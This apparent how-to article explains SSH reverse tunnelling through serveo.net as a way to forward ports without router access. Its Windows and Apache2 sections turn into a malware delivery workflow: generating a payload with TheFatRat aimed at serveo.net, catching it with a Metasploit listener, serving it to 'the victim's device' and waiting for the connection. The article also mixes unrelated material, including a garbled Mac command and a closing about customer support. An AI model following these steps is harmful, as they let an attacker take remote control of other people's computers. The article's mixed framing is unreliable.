Port forward without router access is always a tedious process for those who do not have a router. There are certain methods to forward the port without a router. Through this article, we will discuss the essential methods by which we can forward our ports, so we can use the PC’s home server and locally hosted website from anywhere anytime. It is understood that we need to set up the port forward without router access as there can be a problem and ISP blocks the port forwarding and some do not even have to port the forwarding feature. Let’s start the topic and discuss more it.
Port forward without router access windows 10
- First of all open the Terminal.
- Just run the following command to create a TCP forwarding tunnel. “ssh -R 1500:localhost:1492 serveo.net”.
- Remember, 1500- port of the servo service and 1492 is a port of server service that will forward to, so your listener should listen on 1492 port.
- Creating a payload: You can use “TheFatRat” to generate the payload. So, the host and the port can be “Set LHOST IP: serveo.net and Set LPORT:1500.
- Creating listener using the Metasploit: The Host and Port will be as following: Set LHOST IP: 0.0.0.0 and set LPORT: 1492.
How to port forward without router access on mac?
- The process is very simple, first of all, you need to enable the remote login service on Mac.
- You have to go to the “System Preferences” followed by “Sharing” and “Remote Login”.
- Doing this will start your ssh server.
- You need to run the following command in your operating system x terminal: ssh -L 200.234.XXX.XXX:10000:10.211.55.5:80 -N 127.0.0.1.
- Remember, you may need to accept the server fingerprint initially as well as the type in the local password for ssh login.
Port forwarding without Router admin access via Apache2 server
Since the ISP does not allow the port forward without router access, then it is very much important to think that how to access the apache2 server via affected devices. The port forward without router access steps can be a rescue option and we can use the exact same method that we have used above to forward port 80 to our apache 2 server, you need to follow the steps that are given below:
- First of all, you need to run the Apache2 service and enter the command: “service apache2 start”.
- You have to run the following command to request port forwarding from the server.
- You may substitute “lordvordex” for whatever the sub-domain you like to request from the Server to access the localhost from the victim’s device.
- Enter the “ssh -R lordvordex:80:localhost:80 serveo.net” command when prompted.
- You can now access the localhost from the Lordvordex.serveo.net from the affected device.
- Finally, you have to run the payload.
- Wait till you see a connection is successfully made and you have completed the steps for routes setup.
In a conclusive viewpoint:
By the end of this topic, we just hope that this article has given you some meaningful insights to port forward without router access without any interruptions in the process. However, if you are still stuck somewhere in between the steps to be followed then w suggest you visit the official customer support website and get assistance for the same. You can also chat or message the support team via the helpline number available on the website.